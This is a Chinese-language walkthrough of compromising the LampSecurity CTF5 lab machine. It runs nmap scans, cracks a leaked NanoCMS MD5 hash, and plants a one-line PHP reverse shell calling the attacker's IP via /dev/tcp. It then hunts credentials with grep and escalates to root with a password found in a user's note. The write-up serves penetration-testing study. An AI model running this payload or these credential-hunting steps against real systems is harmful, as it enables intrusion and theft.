LampSecurityCTF5 靶机渗透
主机发现
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:05 CST
Nmap scan report for 192.168.50.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00010s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.155
Host is up (0.00013s latency).
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:06 CST
Nmap scan report for 192.168.50.155
Host is up (0.0016s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
33302/tcp open unknown
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.87 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,33302 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:07 CST
Nmap scan report for 192.168.50.155
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 ipop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
33302/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.50.155; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.69 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:08 CST
Warning: 192.168.50.155 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.50.155
Host is up (0.0012s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
111/udp open rpcbind
5353/udp open zeroconf
32768/udp open omad
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 72.86 seconds
漏洞脚本扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,33302 192.168.50.155
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 23:10 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.50.155
Host is up (0.00023s latency).
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.50.155
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.50.155:80/events/
| Form id: user-login-form
| Form action: /events/?q=node&destination=node
|
| Path: http://192.168.50.155:80/?page=contact
| Form id:
| Form action: ?page=contact
|
| Path: http://192.168.50.155:80/events/?q=comment/reply/3
| Form id: comment-form
| Form action: /events/?q=comment/reply/3
|
| Path: http://192.168.50.155:80/events/?q=comment/reply/3
| Form id: user-login-form
| Form action: /events/?q=comment/reply/3&destination=comment%2Freply%2F3
|
| Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event/2024/09/23/month
|
| Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
| Form id: event-type-filter-form
| Form action: /events/?q=event/2024/09/23/month
|
| Path: http://192.168.50.155:80/events/?q=event/2024/09/23/month
| Form id: user-login-form
| Form action: /events/?q=event/2024/09/23/month&destination=event%2F2024%2F09%2F23%2Fmonth
|
| Path: http://192.168.50.155:80/events/?q=tracker
| Form id: user-login-form
| Form action: /events/?q=tracker&destination=tracker
|
| Path: http://192.168.50.155:80/events/?q=node&destination=node
| Form id: user-login-form
| Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.50.155:80/events/?q=event/2009/04/29
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event/2009/04/29
|
| Path: http://192.168.50.155:80/events/?q=event/2009/04/29
| Form id: event-type-filter-form
| Form action: /events/?q=event/2009/04/29
|
| Path: http://192.168.50.155:80/events/?q=event/2009/04/29
| Form id: user-login-form
| Form action: /events/?q=event/2009/04/29&destination=event%2F2009%2F04%2F29
|
| Path: http://192.168.50.155:80/events/?q=user/register
| Form id: user-register
| Form action: /events/?q=user/register
|
| Path: http://192.168.50.155:80/events/?q=node/1
| Form id: user-login-form
| Form action: /events/?q=node/1&destination=node%2F1
|
| Path: http://192.168.50.155:80/events/?q=comment/reply/2
| Form id: comment-form
| Form action: /events/?q=comment/reply/2
|
| Path: http://192.168.50.155:80/events/?q=comment/reply/2
| Form id: user-login-form
|_ Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=about%27%20OR%20sqlspider
| http://192.168.50.155:80/?page=contact%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_ http://192.168.50.155:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
| /squirrelmail/images/sm_logo.png: SquirrelMail
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting folder
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
33302/tcp open unknown
MAC Address: 00:0C:29:AB:B8:24 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 174.31 seconds
web 渗透
访问 80
在 blog 中看到 nanocms,似乎是个突破口
searchsploit 看一下,是 一个有认证的远程代码执行RCE
┌──(kali㉿kali)-[~]
└─$ sudo searchsploit nanocms
[sudo] password for kali:
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50997.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
搜一搜 nanocms exploit
http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141
很好,找到 txt 会泄露密码啊的哈希
http://192.168.50.155/~andy/data/pagesdata.txt
网络搜索很好用,这个路径没法通过一般的 dirb 或 gobuster 得到
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.155/~andy/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 23 23:22:34 2024
URL_BASE: http://192.168.50.155/~andy/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.155/~andy/ ----
==> DIRECTORY: http://192.168.50.155/~andy/data/
+ http://192.168.50.155/~andy/index.php (CODE:200|SIZE:1965)
---- Entering directory: http://192.168.50.155/~andy/data/ ----
+ http://192.168.50.155/~andy/data/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.50.155/~andy/data/libs/
==> DIRECTORY: http://192.168.50.155/~andy/data/pages/
---- Entering directory: http://192.168.50.155/~andy/data/libs/ ----
---- Entering directory: http://192.168.50.155/~andy/data/pages/ ----
-----------------
END_TIME: Mon Sep 23 23:23:08 2024
DOWNLOADED: 18448 - FOUND: 2
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.50.155 -w /usr/share/wordlists/dirbuster/directories.jbrofuzz
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
[ERROR] parse "http://192.168.50.155/%": invalid URL escape "%"
/. (Status: 200) [Size: 1538]
/?? (Status: 200) [Size: 1538]
/events (Status: 301) [Size: 316] [--> http://192.168.50.155/events/]
/inc (Status: 301) [Size: 313] [--> http://192.168.50.155/inc/]
/list (Status: 301) [Size: 314] [--> http://192.168.50.155/list/]
/mail (Status: 301) [Size: 314] [--> http://192.168.50.155/mail/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://192.168.50.155/phpmyadmin/]
/squirrelmail (Status: 301) [Size: 322] [--> http://192.168.50.155/squirrelmail/]
Progress: 58688 / 58689 (100.00%)
===============================================================
Finished
===============================================================
要是指定一下扩展名呢,也搜不到
把密码的哈希找到,并尝试破解
a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}
解一下
9d2f75377ac0ab991d40c91fd27e52fd
将要使用 rockyou 字典,对于 gz 的压缩格式应使用 gunzip,-k 参数表示保留.gz 文件并解压,位置中将存在解压前和解压后的文件
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo gunzip rockyou.txt.gz -k
使用 rockyou 作为 md5 的破解字典是靶机学习用途,基于 web 的 md5 更通用也更快速
┌──(kali㉿kali)-[~]
└─$ sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
[sudo] password for kali:
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
9d2f75377ac0ab991d40c91fd27e52fd:shannon
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 9d2f75377ac0ab991d40c91fd27e52fd
Time.Started.....: Tue Sep 24 22:03:57 2024 (0 secs)
Time.Estimated...: Tue Sep 24 22:03:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 74450 H/s (0.19ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> dangerous
Hardware.Mon.#1..: Util: 12%
Started: Tue Sep 24 22:03:36 2024
Stopped: Tue Sep 24 22:03:58 2024
尝试账号密码
admin
shannon
成功登录
写个小马
More information at andycarp.com
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
初级的反弹 shell
初级 shell
看一下基础信息
当前用户,ip,内核,当前用户权限,dpkg包管理器等等
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.50.155:59919.
bash: no job control in this shell
bash-3.2$ whoami
apache
bash-3.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:ab:b8:24 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.155/24 brd 192.168.50.255 scope global eth1
inet6 fe80::20c:29ff:feab:b824/64 scope link
valid_lft forever preferred_lft forever
bash-3.2$ dpkg -l
bash: dpkg: command not found
bash-3.2$ uname -a
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$
看一下用户
bash-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
使用 grep 查找包含字符串的文本文件。为了方便观察,把错误信息扔垃圾桶
grep -R -i pass /home/* 2>/dev/null
内容很多,找出有用的内容
这个文件似乎有点用处
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
/home/andy/public_html/data/admin-design/loginform.php: <tr><td><?php _lt('Password'); ?></td><td><input type='password' name='pass'></td></tr>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
文件中泄露 root 用户的密码
50$cent
bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
</note>bash-3.2$
好,那么好,就用这个密码 50$cent 登录 root 用户
这个 shell 的交互性不好,无法直接登录 root
bash-3.2$ su -
standard in must be a tty
尝试使用 python 升级 shell,虽然不知道机器有没有装 python
原来有 python
bash-3.2$ python --version
Python 2.5.1
当前的 shell 为 /bin/bash,无法完成 root 登录,考虑用 python 搞个 /bin/sh 的 shell
bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$
成了
sh-3.2$ su -
su -
Password: 50$cent
[root@localhost ~]# whoami
whoami
root
[root@localhost ~]#
确实搞到了 root ,拥有全部权限
[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:ab:b8:24 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.155/24 brd 192.168.50.255 scope global eth1
inet6 fe80::20c:29ff:feab:b824/64 scope link
valid_lft forever preferred_lft forever
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:httpd_t:s0
[root@localhost ~]# sudo -l
sudo -l
User root may run the following commands on this host:
(ALL) ALL
[root@localhost ~]#
总结
nmap 扫描 主机,端口,漏洞脚本
访问 80 端口,web 上有一套 cms
网络上找 cms 的利用,找到一个信息泄露,拿到 cms 后台的密码 md5
用 hashcat 破解 md5 使用字典 rockyou
拿到密码铭文 shannon,用这个密码登录后台
发现后台可以控制页面,还可在其中写 php 代码,遂写个反弹 shell
拿到初级 shell,用户为 apache
看 passwd 发现很多用户
查找历史文件看一看敏感文件有无重要信息泄露
使用 grep 递归的忽略大小写的查找字符串 pass 在用户的家目录中 /home/* 查找
发现密码,用 python 升级 shell,登录 root 用户,拿下
结束
遗留
机器开放端口比较多,似乎还有其他解法,这些解法可能也很简单…
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
